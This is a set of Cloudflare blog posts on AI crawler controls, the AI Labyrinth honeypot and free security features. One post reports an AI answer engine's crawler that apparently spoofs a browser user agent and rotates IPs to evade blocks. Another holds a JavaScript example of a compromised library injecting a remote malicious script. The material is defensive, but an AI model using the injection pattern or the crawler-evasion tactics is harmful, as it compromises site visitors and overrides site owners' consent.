The Cloudflare Blog

Perplexity is using stealth, undeclared crawlers to evade website no-crawl directives

Gabriel Corral — Mon, 04 Aug 2025 13:00:00 GMT

We are observing stealth crawling behavior from Perplexity, an AI-powered answer engine. Although Perplexity initially crawls from their declared user agent, when they are presented with a network block, they appear to obscure their crawling identity in an attempt to circumvent the website’s preferences. We see continued evidence that Perplexity is repeatedly modifying their user agent and changing their source ASNs to hide their crawling activity, as well as ignoring — or sometimes failing to even fetch — robots.txt files.

The Internet as we have known it for the past three decades is rapidly changing, but one thing remains constant: it is built on trust. There are clear preferences that crawlers should be transparent, serve a clear purpose, perform a specific activity, and, most importantly, follow website directives and preferences. Based on Perplexity’s observed behavior, which is incompatible with those preferences, we have de-listed them as a verified bot and added heuristics to our managed rules that block this stealth crawling.

How we tested

We received complaints from customers who had both disallowed Perplexity crawling activity in their robots.txt files and also created WAF rules to specifically block both of Perplexity’s declared crawlers: PerplexityBot and Perplexity-User. These customers told us that Perplexity was still able to access their content even when they saw its bots successfully blocked. We confirmed that Perplexity’s crawlers were in fact being blocked on the specific pages in question, and then performed several targeted tests to confirm what exact behavior we could observe.

We created multiple brand-new domains, similar to testexample.com and secretexample.com. These domains were newly purchased and had not yet been indexed by any search engine nor made publicly accessible in any discoverable way. We implemented a robots.txt file with directives to stop any respectful bots from accessing any part of a website:

We conducted an experiment by querying Perplexity AI with questions about these domains, and discovered Perplexity was still providing detailed information regarding the exact content hosted on each of these restricted domains. This response was unexpected, as we had taken all necessary precautions to prevent this data from being retrievable by their crawlers.

Obfuscating behavior observed

Bypassing Robots.txt and undisclosed IPs/User Agents

Our multiple test domains explicitly prohibited all automated access by specifying in robots.txt and had specific WAF rules that blocked crawling from Perplexity’s public crawlers. We observed that Perplexity uses not only their declared user-agent, but also a generic browser intended to impersonate Google Chrome on macOS when their declared crawler was blocked.

Declared	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Perplexity-User/1.0; +https://perplexity.ai/perplexity-user)	20-25m daily requests
Stealth	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36	3-6m daily requests

Both their declared and undeclared crawlers were attempting to access the content for scraping contrary to the web crawling norms as outlined in RFC 9309.

This undeclared crawler utilized multiple IPs not listed in Perplexity’s official IP range, and would rotate through these IPs in response to the restrictive robots.txt policy and block from Cloudflare. In addition to rotating IPs, we observed requests coming from different ASNs in attempts to further evade website blocks. This activity was observed across tens of thousands of domains and millions of requests per day. We were able to fingerprint this crawler using a combination of machine learning and network signals.

An example:

Of note: when the stealth crawler was successfully blocked, we observed that Perplexity uses other data sources — including other websites — to try to create an answer. However, these answers were less specific and lacked details from the original content, reflecting the fact that the block had been successful.

How well-meaning bot operators respect website preferences

In contrast to the behavior described above, the Internet has expressed clear preferences on how good crawlers should behave. All well-intentioned crawlers acting in good faith should:

Be transparent. Identify themselves honestly, using a unique user-agent, a declared list of IP ranges or Web Bot Auth integration, and provide contact information if something goes wrong.

Be well-behaved netizens. Don’t flood sites with excessive traffic, scrape sensitive data, or use stealth tactics to try and dodge detection.

Serve a clear purpose. Whether it’s powering a voice assistant, checking product prices, or making a website more accessible, every bot has a reason to be there. The purpose should be clearly and precisely defined and easy for site owners to look up publicly.

Separate bots for separate activities. Perform each activity from a unique bot. This makes it easy for site owners to decide which activities they want to allow. Don’t force site owners to make an all-or-nothing decision.

Follow the rules. That means checking for and respecting website signals like robots.txt, staying within rate limits, and never bypassing security protections.

More details are outlined in our official Verified Bots Policy Developer Docs.

OpenAI is an example of a leading AI company that follows these best practices. They clearly outline their crawlers and give detailed explanations for each crawler’s purpose. They respect robots.txt and do not try to evade either a robots.txt directive or a network level block. And ChatGPT Agent is signing http requests using the newly proposed open standard Web Bot Auth.

When we ran the same test as outlined above with ChatGPT, we found that ChatGPT-User fetched the robots file and stopped crawling when it was disallowed. We did not observe follow-up crawls from any other user agents or third party bots. When we removed the disallow directive from the robots entry, but presented ChatGPT with a block page, they again stopped crawling, and we saw no additional crawl attempts from other user agents. Both of these demonstrate the appropriate response to website owner preferences.

How can you protect yourself?

All the undeclared crawling activity that we observed from Perplexity’s hidden User Agent was scored by our bot management system as a bot and was unable to pass managed challenges. Any bot management customer who has an existing block rule in place is already protected. Customers who don’t want to block traffic can set up rules to challenge requests, giving real humans an opportunity to proceed. Customers with existing challenge rules are already protected. Lastly, we added signature matches for the stealth crawler into our managed rule that blocks AI crawling activity. This rule is available to all customers, including our free customers.

What’s next?

It's been just over a month since we announced Content Independence Day, giving content creators and publishers more control over how their content is accessed. Today, over two and a half million websites have chosen to completely disallow AI training through our managed robots.txt feature or our managed rule blocking AI Crawlers. Every Cloudflare customer is now able to selectively decide which declared AI crawlers are able to access their content in accordance with their business objectives.

We expected a change in bot and crawler behavior based on these new features, and we expect that the techniques bot operators use to evade detection will continue to evolve. Once this post is live the behavior we saw will almost certainly change, and the methods we use to stop them will keep evolving as well.

Cloudflare is actively working with technical and policy experts around the world, like the IETF efforts to standardize extensions to robots.txt, to establish clear and measurable principles that well-meaning bot operators should abide by. We think this is an important next step in this quickly evolving space.

Control content use for AI training with Cloudflare’s managed robots.txt and blocking for monetized content

Jin-Hee Lee — Tue, 01 Jul 2025 10:00:00 GMT

Cloudflare is giving all website owners two new tools to easily control whether AI bots are allowed to access their content for model training. First, customers can let Cloudflare create and manage a robots.txt file, creating the appropriate entries to let crawlers know not to access their site for AI training. Second, all customers can choose a new option to block AI bots only on portions of their site that are monetized through ads.

The new generation of AI crawlers

Creators that monetize their content by showing ads depend on traffic volume. Their livelihood is directly linked to the number of views their content receives. These creators have allowed crawlers on their sites for decades, for a simple reason: search crawlers such as Googlebot made their sites more discoverable, and drove more traffic to their content. Google benefitted from delivering better search results to their customers, and the site owners also benefitted through increased views, and therefore increased revenues.

But recently, a new generation of crawlers has appeared: bots that crawl sites to gather data for training AI models. While these crawlers operate in the same technical way as search crawlers, the relationship is no longer symbiotic. AI training crawlers use the data they ingest from content sites to answer questions for their own customers directly, within their own apps. They typically send much less traffic back to the site they crawled. Our Radar team did an analysis of crawls and referrals for sites behind Cloudflare. As HTML pages are arguably the most valuable content for these crawlers, we calculated crawl ratios by dividing the total number of requests from relevant user agents associated with a given search or AI platform where the response was of Content-type: text/html by the total number of requests for HTML content where the Referer: header contained a hostname associated with a given search or AI platform. As of June 2025, we find that Google crawls websites about 14 times for every referral. But for AI companies, the crawl-to-refer ratio is orders of magnitude greater. In June 2025, OpenAI’s crawl-to-referral ratio was 1,700:1, Anthropic’s 73,000:1. This clearly breaks the “crawl in exchange for traffic” relationship that previously existed between search crawlers and publishers. (Please note that this calculation reflects our best estimate, recognizing that traffic referred by native apps may not always be attributed to a provider due to a lack of a Referer: header, which may affect the ratio.)

And while sites can use robots.txt to tell these bots not to crawl their site, most don’t take this first step. We found that only about 37% of the top 10,000 domains currently have a robots.txt file, showing that robots.txt is underutilized in this age of evolving crawlers.

That’s where Cloudflare comes in. Our mission is to help build a better Internet, and a better Internet is one with a huge thriving ecosystem of independent publishers. So, we’re taking action to keep that ecosystem alive.

Giving ALL customers full control

Protecting content creators isn’t new for Cloudflare. In July 2024, we gave everyone on the Cloudflare network a simple way to block all AI scrapers with a single click for free. We’ve already seen more than 1 million customers enable this feature, which has given us some interesting data.

Since our last update, we can see that Bytespider, our previous top bot, has seen traffic volume decline 71.45% since the first week of July 2024. During the same time, we saw an increased number of Bytespider requests that customers chose to specifically block. In contrast, GPTBot traffic volume has grown significantly as it has become more popular, now even surpassing traffic we see from big traditional tech players like Amazon and ByteDance.

The share of sites accessed by particular crawlers has gone down across the board since our last update. Previously, Bytespider accessed >40% of websites protected by Cloudflare, but that number has dropped to only 9.37%. GPTBot has taken the top spot for most sites accessed, but while its request volume has grown significantly (noted above), the share of sites it crawls has actually decreased since last year from 35.46% to 28.97%, with an increase in customers blocking.

AI Bot	Share of Websites Accessed
GPTBot	28.97%
Meta-ExternalAgent	22.16%
ClaudeBot	18.80%
Amazonbot	14.56%
Bytespider	9.37%
GoogleOther	9.31%
ImageSiftBot	4.45%
Applebot	3.77%
OAI-SearchBot	1.66%
ChatGPT-User	1.06%

And while AI Search and AI Assistant crawling related activity has exploded in popularity in the last 6 months, we still see their total traffic pale in comparison to AI training crawl activity, which has seen a 65% increase in traffic over the past 6 months.

To this end, we launched free granular auditing in September 2024 to help customers understand which crawlers were accessing their content most often, and created simple templates to block all or specific crawlers. And in December 2024, we made it easy for publishers to automatically block crawlers that weren’t respecting robots.txt. But we realized many sites didn’t have the time to create or manage their own robots.txt file. Today, we’re going two steps further.

Step 1: fully managed robots.txt

When it comes to managing your website’s visibility to search engine crawlers and other bots, the robots.txt file is a key player. This simple text file acts like a traffic controller, signaling to bots which parts of the website they should or should not access. We can think of robots.txt as a "Code of Conduct" sign posted at a community pool, listing general dos and don'ts, according to the pool owner’s wishes. While the sign itself does not enforce the listed directives, well-behaved visitors will still read the sign and follow the instructions they see. On the other hand, poorly-behaved visitors who break the rules risk getting themselves banned.

What do these files actually look like? Take Google’s as an example, visible to anyone at https://www.google.com/robots.txt. Parsing its contents, you'll notice four directives in the set of instructions: User-agent, Disallow, Allow, and Sitemap. In a robots.txt file, the User-agent directive specifies which bots the rules apply to. The Disallow directive tells those bots which parts of the website they should avoid. In contrast, the Allow directive grants specific bots permission to access certain areas. Finally, the Sitemap directive shows a bot which pages it can reach, so that it won’t miss any important pages. The Internet Engineering Task Force (IETF) formalized the definition and language for the Robots Exclusion Protocol in RFC 9309, specifying the exact syntax and precedence of these directives. It also outlines how crawlers should handle errors or redirects while stressing that compliance is voluntary and does not constitute access control.

Website owners should have agency over AI bot activity on their websites. We mentioned that only 37% of the top 10,000 domains on Cloudflare even have a robots.txt file. Of those robots files that do exist, few include Disallow directives for the top AI Bots that we see on a daily basis. For instance, as of publication, GPTBot is only disallowed in 7.8% of the robots.txt files found for the top domains; Google-Extended only shows up in 5.6%; anthropic-ai, PerplexityBot, ClaudeBot, and Bytespider each show up in under 5%. Furthermore, the difference between the 7.8% of Disallow directives for GPTBot and the ~5% of Disallow directives for other major AI crawlers suggests a gap between the desire to prevent your content from being used for AI model training and the proper configuration that accomplishes this by calling out bots like Google-Extended. (After all, there’s more to stopping AI crawlers than disallowing GPTBot.)

Along with viewing the most active bots and crawlers, Cloudflare Radar also shares weekly updates on how websites are handling AI bots in their robots.txt files. We can examine two snapshots below, one from June 2025 and the other from January 2025:

_{Radar snapshot from the week of June 23, 2025, showing the top AI user agents mentioned in the Disallow directive in robots.txt files across the top 10,000 domains. The 3 bots with the highest number of Disallows are GPTBot, CCBot, and facebookexternalhit.}

_{Radar snapshot from the week of January 26, 2025, showing the top AI user agents mentioned in the Disallow directive in robots.txt files across the top 10,000 domains. The 3 bots with the highest number of Disallows are GPTBot, CCBot, and anthropic-ai.}

From the above data, we also observe that fewer than 100 new robots.txt files have been added among the top domains between January and June. One visually striking change is the ratio of dark blue to light blue: compared to January, there is a steep decrease in “Partially Disallowed” permissions; websites are now flat-out choosing “Fully Disallowed” for the top AI crawlers, including GPTBot, CCBot, and Google-Extended. This underscores the changing landscape of web crawling, particularly the relationship of trust between website owners and AI crawlers.

Putting up a guardrail with Cloudflare’s managed robots.txt

Many website owners have told us they’re in a tricky spot in this new era of AI crawlers. They’ve poured time and effort into creating original content, have published it on their own sites, and naturally want it to reach as many people as possible. To do that, website owners make their sites accessible to search engine crawlers, which index the content and make it discoverable in search results. But with the rise of AI-powered crawlers, that same content is now being scraped not just for indexing, but also to train AI models, often without the creator’s explicit consent. Take Googlebot, for example: it’s an absolute requirement for most website owners to allow for SEO. But Google crawls with user agent Googlebot for both SEO and AI training purposes. Specifically disallowing Google-Extended (but not Googlebot) in your robots.txt file is what communicates to Google that you do not want your content to be crawled to feed AI training.

So, what if you don’t want your content to serve as training data for the next AI model, but don’t have the time to manually maintain an up-to-date robots.txt file? Enter Cloudflare’s new managed robots.txt offering. Once enabled, Cloudflare will automatically update your existing robots.txt or create a robots.txt file on your site that includes directives asking popular AI bot operators to not use your content for AI model training. For instance, Cloudflare’s managed robots.txt signals your preference to Google-Extended and Applebot-Extended, amongst others, that they should not crawl your site for AI training, while keeping your domain(s) SEO-friendly.

^{Cloudflare dashboard snapshot of the new managed robots.txt activation toggle}

This feature is available to all customers, meaning anyone can enable this today from the Cloudflare dashboard. Once enabled, website owners who previously had no robots.txt file will now have Cloudflare’s managed bot directives live on their website. What about website owners who already have a robots.txt file? The contents of Cloudflare’s managed robots.txt will be prepended to site owners’ existing file. This way, their existing Block directives – and the time and rationale put into customizing this file – are honored, while still ensuring the website has AI crawler guardrails managed by Cloudflare.

As the AI bot landscape changes with new bots on the rise, Cloudflare will keep our customers a step ahead by updating the directives on our managed robots.txt, so they don’t have to worry about maintaining things on their own. Once enabled, customers won’t need to take any action in order for any updates of the managed robots.txt content to go live on their site.

We believe that managing crawling is key to protecting the open Internet, so we’ll also be encouraging every new site that onboards to Cloudflare to enable our managed robots.txt. When you onboard a new site, you’ll see the following options for managing AI crawlers:

This makes it effortless to ensure that every new customer or domain onboarded to Cloudflare gives clear directives to how they want their content used.

Under the hood: technical implementation

To implement this feature, we developed a new module that intercepts all inbound HTTP requests for /robots.txt. For all such requests, we’ll check whether the zone has opted in to use Cloudflare’s managed robots.txt by reading a value from our distributed key-value store. If they have, the module then responds with the Cloudflare’s managed robots.txt directives, prepended to the origin’s robot.txt if there is an existing file. We prepend so we can add a generalized header that instructs all bots on the customers preferences for data use, as defined in the IETF AI preferences proposal. Note that in robots.txt, the most specific match must always be used, and since our disallow expressions are scoped to cover everything, we can ensure a directive we prepend will never conflict with a more targeted customer directive. If the customer has not enabled this feature, the request is forwarded to the origin server as usual, using whatever the customer has written in their own robots.txt file. (While caching origin's robots.txt could reduce latency by eliminating a round trip to the origin, the impact on overall page load times would be minimal, as robots.txt requests comprise a small fraction of total traffic. Adding cache update/invalidation would introduce complexity with limited benefit, so we prioritized functionality and reliability in our implementation.)

Step 2: block, but only where you show ads

Adding an entry to your robots.txt file is the first step to telling AI bots not to crawl you. But robots.txt is an honor system. Nothing forces bots to follow it. That’s why we introduced our one-click managed rule to block all AI bots across your zone. However, some customers want AI bots to visit certain pages, like developer or support documentation. For customers who are hesitant to block everywhere, we have a brand-new option: let us detect when ads are shown on a hostname, and we will block AI bots ONLY on that hostname. Here’s how we do it.

First, we use multiple techniques to identify if a request is coming from an AI bot. The easiest technique is to identify well-behaved crawlers that publicly declare their user agent, and use dedicated IP ranges. Often we work directly with these bot makers to add them to our Verified Bot list.

Many bot operators act in good faith by publicly publishing their user agents, or even cryptographically verifying their bot requests directly with Cloudflare. Unfortunately, some attempt to appear like a real browser by using a spoofed user agent. It's not new for our global machine learning models to recognize this activity as a bot, even when operators lie about their user agent. When bad actors attempt to crawl websites at scale, they generally use tools and frameworks that we’re able to fingerprint, and we use Cloudflare’s network of over 57 million requests per second on average, to understand how much we should trust the fingerprint. We compute global aggregates across many signals, and based on these signals, our models are able to consistently and appropriately flag traffic from evasive AI bots.

When we see a request from an AI bot, our system checks if we have previously identified ads in the response served by the target page. To do this, we inspect the “response body” — the raw HTML code of the web page being sent back. After parsing the HTML document, we perform a comprehensive scan for code patterns commonly found in ad units, which signals to us that the page is serving an ad. Examples of such code would be:

Here, the div-container has the ui-advert class commonly used for advertising. Similarly, links to commonly used ad servers like Google Syndication are a good signal as well, such as the following:

By streaming and directly parsing small chunks of the response using our ultra-fast LOL HTML parser, we can perform scans without adding any latency to the inspected response.

So as not to reinvent the wheel, we are adopting techniques similar to those that ad blockers have been using for years. Ad blockers fundamentally perform two separate tasks to block advertisements in a browser. The first is to block the browser from fetching resources from ad servers, and the second is to suppress displaying HTML elements that contain ads. For this, ad blockers rely on large filter lists such as EasyList that contain both so-called URL block filters that match outgoing request URLs against a set of patterns, and block them if they match one of the filters, and CSS selectors that are designed to match HTML ad elements.

We can use both of these techniques to detect if an HTML response contains ads by checking external resources (e.g. content referenced by HREF or SCRIPT tags) against URL block filters, and the HTML elements themselves against CSS selectors. Because we do not actually need to block every single advertisement on a site, but rather detect the overall presence of ads on a site, we can achieve the same detection efficacy when shrinking the number of CSS and URL filters down from more than 40,000 in EasyList to the 400 most commonly seen ones to increase our computational efficiency.

Because some sites load ads dynamically rather than directly in the returned HTML (partially to avoid ad blocking), we enrich this first information source with data from Content Security Policy (CSP) reports. The Content Security Policy standard is a security mechanism that helps web developers control the resources (like scripts, stylesheets, and images) a browser is allowed to load for a specific web page, and browsers send reports about loaded resources to a CSP management system, which for many sites is Cloudflare’s Page Shield product. These reports allow us to relate scripts loaded from ad servers directly with page URLs. Both of these information sources are consumed by our endpoint management service, which then matches incoming requests against hostnames that we already know are serving ads.

We do all of this on every request for any customer who opts in, even free customers.

To enable this feature, simply navigate to the Security > Settings > Bots section of the Cloudflare dashboard, and choose either Block on pages with Ads or Block Everywhere.

The AI bot hunt: finding and identifying bots

The AI bot landscape has exploded and continues to grow with an exponential trajectory as more and more operators come online. At Cloudflare, our team of security researchers are constantly identifying and classifying different AI-related crawlers and scrapers across our network.

There are two major ways in which we track AI bots and identify those that are poorly behaved:

1. Our customers play a crucial role by directly submitting reports of misbehaved AI bots that may not yet be classified by Cloudflare. (If you have an AI bot that comes to mind here, we’d love for you to let us know through our bots submission form today.) Once such a bot comes to our attention, our security analysts investigate to determine how it should be categorized.

2. We’re able to derive insights through analysis of the massive scale of our customers’ traffic that we observe. Specifically, we can see which AI agents visit which websites and when, drawing out trends or patterns that might make a website owner want to disallow a given AI bot. This bird’s-eye view on abusive AI bot behavior was paramount as we started to determine the content of a managed robots.txt.

What’s next?

Our new managed robots.txt and blocking AI bots on pages with ads features are available to all Cloudflare customers, including everyone on a Free plan. We encourage customers to start using them today – to take control over how the content on your website gets used. Looking ahead, Cloudflare will monitor the IETF’s pending proposal allowing website publishers to control how automated systems use their content and update our managed robots.txt accordingly. We will also continue to provide more granular control around AI bot management and investigate new distinguishing signals as AI bots become more and more precise. And if you’ve seen suspicious behavior from an AI scraper, contribute to the Internet ecosystem by letting us know!

Trapping misbehaving bots in an AI Labyrinth

Reid Tatoris — Wed, 19 Mar 2025 13:00:00 GMT

Today, we’re excited to announce AI Labyrinth, a new mitigation approach that uses AI-generated content to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. When you opt in, Cloudflare will automatically deploy an AI-generated set of linked pages when we detect inappropriate bot activity, without the need for customers to create any custom rules.

AI Labyrinth is available on an opt-in basis to all customers, including the Free plan.

Using Generative AI as a defensive weapon

AI-generated content has exploded, reportedly accounting for four of the top 20 Facebook posts last fall. Additionally, Medium estimates that 47% of all content on their platform is AI-generated. Like any newer tool it has both wonderful and malicious uses.

At the same time, we’ve also seen an explosion of new crawlers used by AI companies to scrape data for model training. AI Crawlers generate more than 50 billion requests to the Cloudflare network every day, or just under 1% of all web requests we see. While Cloudflare has several tools for identifying and blocking unauthorized AI crawling, we have found that blocking malicious bots can alert the attacker that you are on to them, leading to a shift in approach, and a never-ending arms race. So, we wanted to create a new way to thwart these unwanted bots, without letting them know they’ve been thwarted.

To do this, we decided to use a new offensive tool in the bot creator’s toolset that we haven’t really seen used defensively: AI-generated content. When we detect unauthorized crawling, rather than blocking the request, we will link to a series of AI-generated pages that are convincing enough to entice a crawler to traverse them. But while real looking, this content is not actually the content of the site we are protecting, so the crawler wastes time and resources.

As an added benefit, AI Labyrinth also acts as a next-generation honeypot. No real human would go four links deep into a maze of AI-generated nonsense. Any visitor that does is very likely to be a bot, so this gives us a brand-new tool to identify and fingerprint bad bots, which we add to our list of known bad actors. Here’s how we do it…

How we built the labyrinth

When AI crawlers follow these links, they waste valuable computational resources processing irrelevant content rather than extracting your legitimate website data. This significantly reduces their ability to gather enough useful information to train their models effectively.

To generate convincing human-like content, we used Workers AI with an open source model to create unique HTML pages on diverse topics. Rather than creating this content on-demand (which could impact performance), we implemented a pre-generation pipeline that sanitizes the content to prevent any XSS vulnerabilities, and stores it in R2 for faster retrieval. We found that generating a diverse set of topics first, then creating content for each topic, produced more varied and convincing results. It is important to us that we don’t generate inaccurate content that contributes to the spread of misinformation on the Internet, so the content we generate is real and related to scientific facts, just not relevant or proprietary to the site being crawled.

This pre-generated content is seamlessly integrated as hidden links on existing pages via our custom HTML transformation process, without disrupting the original structure or content of the page. Each generated page includes appropriate meta directives to protect SEO by preventing search engine indexing. We also ensured that these links remain invisible to human visitors through carefully implemented attributes and styling. To further minimize the impact to regular visitors, we ensured that these links are presented only to suspected AI scrapers, while allowing legitimate users and verified crawlers to browse normally.

^{A graph of daily requests over time, comparing different categories of AI Crawlers.}

What makes this approach particularly effective is its role in our continuously evolving bot detection system. When these links are followed, we know with high confidence that it's automated crawler activity, as human visitors and legitimate browsers would never see or click them. This provides us with a powerful identification mechanism, generating valuable data that feeds into our machine learning models. By analyzing which crawlers are following these hidden pathways, we can identify new bot patterns and signatures that might otherwise go undetected. This proactive approach helps us stay ahead of AI scrapers, continuously improving our detection capabilities without disrupting the normal browsing experience.

By building this solution on our developer platform, we've created a system that serves convincing decoy content instantly while maintaining consistent quality - all without impacting your site's performance or user experience.

How to use AI Labyrinth to stop AI crawlers

Enabling AI Labyrinth is simple and requires just a single toggle in your Cloudflare dashboard. Navigate to the bot management section within your zone, and toggle the new AI Labyrinth setting to on:

Once enabled, the AI Labyrinth begins working immediately with no additional configuration needed.

AI honeypots, created by AI

The core benefit of AI Labyrinth is to confuse and distract bots. However, a secondary benefit is to serve as a next-generation honeypot. In this context, a honeypot is just an invisible link that a website visitor can’t see, but a bot parsing HTML would see and click on, therefore revealing itself to be a bot. Honeypots have been used to catch hackers as early as the late 1986 Cuckoo’s Egg incident. And in 2004, Project Honeypot was created by Cloudflare founders (prior to founding Cloudflare) to let everyone easily deploy free email honeypots, and receive lists of crawler IPs in exchange for contributing to the database. But as bots have evolved, they now proactively look for honeypot techniques like hidden links, making this approach less effective.

AI Labyrinth won’t simply add invisible links, but will eventually create whole networks of linked URLs that are much more realistic, and not trivial for automated programs to spot. The content on the pages is obviously content no human would spend time-consuming, but AI bots are programmed to crawl rather deeply to harvest as much data as possible. When bots hit these URLs, we can be confident they aren’t actual humans, and this information is recorded and automatically fed to our machine learning models to help improve our bot identification. This creates a beneficial feedback loop where each scraping attempt helps protect all Cloudflare customers.

What’s next

This is only the first iteration of using generative AI to thwart bots for us. Currently, while the content we generate is convincingly human, it won’t conform to the existing structure of every website. In the future, we’ll continue to work to make these links harder to spot and make them fit seamlessly into the existing structure of the website they’re embedded in. You can help us by opting in now.

To take the next step in the fight against bots, opt-in to AI Labyrinth today.

A safer Internet with Cloudflare: free threat intelligence, analytics, and new threat detections

Michael Tremante — Tue, 24 Sep 2024 13:00:00 GMT

Anyone using the Internet likely touches Cloudflare’s network on a daily basis, either by accessing a site protected by Cloudflare, using our 1.1.1.1 resolver, or connecting via a network using our Cloudflare One products.

This puts Cloudflare in a position of great responsibility to make the Internet safer for billions of users worldwide. Today we are providing threat intelligence and more than 10 new security features for free to all of our customers. Whether you are using Cloudflare to protect your website, your home network, or your office, you will find something useful that you can start using with just a few clicks.

These features are focused around some of the largest growing concerns in cybersecurity, including account takeover attacks, supply chain attacks, attacks against API endpoints, network visibility, and data leaks from your network.

More security for everyone

You can read more about each one of these features in the sections below, but we wanted to provide a short summary upfront.

If you are a cyber security enthusiast: you can head over to our new Cloudforce One threat intelligence website to find out about threat actors, attack campaigns, and other Internet-wide security issues.

If you are a website owner: starting today, all free plans will get access to Security Analytics for their zones. Additionally, we are also making DNS Analytics available to everyone via GraphQL.

Once you have visibility, it’s all about distinguishing good from malicious traffic. All customers get access to always-on account takeover attack detection, API schema validation to enforce a positive security model on their API endpoints, and Page Shield script monitor to provide visibility into the third party assets that you are loading from your side and that could be used to perform supply chain-based attacks.

If you are using Cloudflare to protect your people and network: We are going to bundle a number of our Cloudflare One products into a new free offering. This bundle will include the current Zero Trust products we offer for free, and new products like Magic Network Monitoring for network visibility, Data Loss Prevention for sensitive data, and Digital Experience Monitoring for measuring network connectivity and performance. Cloudflare is the only vendor to offer free versions of these types of products.

If you are a new user: We have new options for authentication. Starting today, we are introducing the option to use Google Authentication to sign up and log into Cloudflare, which will make it easier for some of our customers to login, and reduce dependence on remembering passwords, consequently reducing the risk of their Cloudflare account becoming compromised.

And now in more detail:

Threat Intelligence & Analytics

Cloudforce One

Our threat research and operations team, Cloudforce One, is excited to announce the launch of a freely accessible dedicated threat intelligence website. We will use this site to publish both technical and executive-oriented information on the latest threat actor activity and tactics, as well as insights on emerging malware, vulnerabilities, and attacks.

We are also publishing two new pieces of threat intelligence, along with a promise for more. Head over to the new website here to see the latest research, covering an advanced threat actor targeting regional organizations across South and East Asia, as well as the rise of double brokering freight fraud. Future research and data sets will also become available as a new Custom Indicator Feed for customers.

Subscribe to receive email notifications of future threat research.

Security Analytics

Security Analytics gives you a security lens across all of your HTTP traffic, not only mitigated requests, allowing you to focus on what matters most: traffic deemed malicious but potentially not mitigated. This means that, in addition to using Security Events to view security actions taken by our Application Security suite of products, you can use Security Analytics to review all of your traffic for anomalies or strange behavior and then use the insights gained to craft precise mitigation rules based on your specific traffic patterns. Starting today, we are making this lens available to customers across all plans.

Free and Pro plan users will now have access to a new dashboard for Security Analytics where you can view a high level overview of your traffic in the Traffic Analysis chart, including the ability to group and filter so that you can zero in on anomalies with ease. You can also see top statistics and filter across a variety of dimensions, including countries, source browsers, source operating systems, HTTP versions, SSL protocol version, cache status, and security actions.

DNS Analytics

Every user on Cloudflare now has access to the new and improved DNS Analytics dashboard as well as access to the new DNS Analytics dataset in our powerful GraphQL API. Now, you can easily analyze the DNS queries to your domain(s), which can be useful for troubleshooting issues, detecting patterns and trends, or generating usage reports by applying powerful filters and breaking out DNS queries by source.

With the launch of Foundation DNS, we introduced new DNS Analytics based on GraphQL, but these analytics were previously only available for zones using advanced nameservers. However, due to the deep insight these analytics provide, we felt this feature was something we should make available to everyone. Starting today, the new DNS Analytics based on GraphQL can be accessed on every zone using Cloudflare’s Authoritative DNS service under Analytics in the DNS section.

Application threat detection and mitigation

Account takeover detection

65% of Internet users are vulnerable to account takeover (ATO) due to password reuse and the rising frequency of large data breaches. Helping build a better Internet involves making critical account protection easy and accessible for everyone.

Starting today, we’re providing robust account security that helps prevent credential stuffing and other ATO attacks to everyone for free — from individual users to large enterprises — making enhanced features like Leaked Credential Checks and ATO detections available at no cost.

These updates include automatic detection of logins, brute force attack prevention with minimal setup, and access to a comprehensive leaked credentials database of over 15 billion passwords which will contain leaked passwords from the Have I been Pwned (HIBP) service in addition to our own database. Customers can take action on the leaked credential requests through Cloudflare’s WAF features like Rate Limiting Rules and Custom Rules, or they can take action at the origin by enforcing multi-factor authentication (MFA) or requiring a password reset based on a header sent to the origin.

Setup is simple: Free plan users get automatic detections, while paid users can activate the new features via one click in the Cloudflare dashboard. For more details on setup and configuration, refer to our documentation and use it today!

API schema validation

API traffic comprises more than half of the dynamic traffic on the Cloudflare network. The popularity of APIs has opened up a whole new set of attack vectors. Cloudflare API Shield’s Schema Validation is the first step to strengthen your API security in the face of these new threats.

Now for the first time, any Cloudflare customer can use Schema Validation to ensure only valid requests to their API make it through to their origin.

This functionality stops accidental information disclosure due to bugs, stops developers from haphazardly exposing endpoints through a non-standard process, and automatically blocks zombie APIs as your API inventory is kept up-to-date as part of your CI/CD process.

We suggest you use Cloudflare’s API or Terraform provider to add endpoints to Cloudflare API Shield and update the schema after your code’s been released as part of your post-build CI/CD process. That way, API Shield becomes a go-to API inventory tool, and Schema Validation will take care of requests towards your API that you aren’t expecting.

While APIs are all about integrating with third parties, sometimes integrations are done by loading libraries directly into your application. Next up, we’re helping secure more of the web by protecting users from malicious third party scripts that steal sensitive information from inputs on your pages.

Supply chain attack prevention

Modern web apps improve their users’ experiences and cut down on developer time through the use of third party JavaScript libraries. Because of its privileged access level to everything on the page, a compromised third party JavaScript library can surreptitiously exfiltrate sensitive information to an attacker without the end user or site administrator realizing it’s happened.

To counter this threat, we introduced Page Shield three years ago. We are now releasing Page Shield’s Script Monitor for free to all our users.

With Script Monitor, you’ll see all JavaScript assets loaded on the page, not just the ones your developers included. This visibility includes scripts dynamically loaded by other scripts! Once an attacker compromises the library, it is trivial to add a new malicious script without changing the context of the original HTML by instead including new code in the existing included JavaScript asset:

// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);

Script Monitor was essential when the news broke of the pollyfill.io library changing ownership. Script Monitor users had immediate visibility to the scripts loaded on their sites and could quickly and easily understand if they were at risk.

We’re happy to extend visibility of these scripts to as much of the web as we can by releasing Script Monitor for all customers. Find out how you can get started here in the docs.

Existing users of Page Shield can immediately filter on the monitored data, knowing whether polyfill.io (or any other library) is used by their app. In addition, we built a polyfill.io rewrite in response to the compromised service, which was automatically enabled for Free plans in June 2024.

Turnstile as a Google Firebase extension

We're excited to announce the Cloudflare Turnstile App Check Provider for Google Firebase, which offers seamless integration without the need for manual setup. This new extension allows developers building mobile or web applications on Firebase to protect their projects from bots using Cloudflare’s CAPTCHA alternative. By leveraging Turnstile's bot detection and challenge capabilities, you can ensure that only authentic human visitors interact with your Firebase backend services, enhancing both security and user experience. Cloudflare Turnstile, a privacy-focused CAPTCHA alternative, differentiates between humans and bots without disrupting the user experience. Unlike traditional CAPTCHA solutions, which users often abandon, Turnstile operates invisibly and provides various modes to ensure frictionless user interactions.

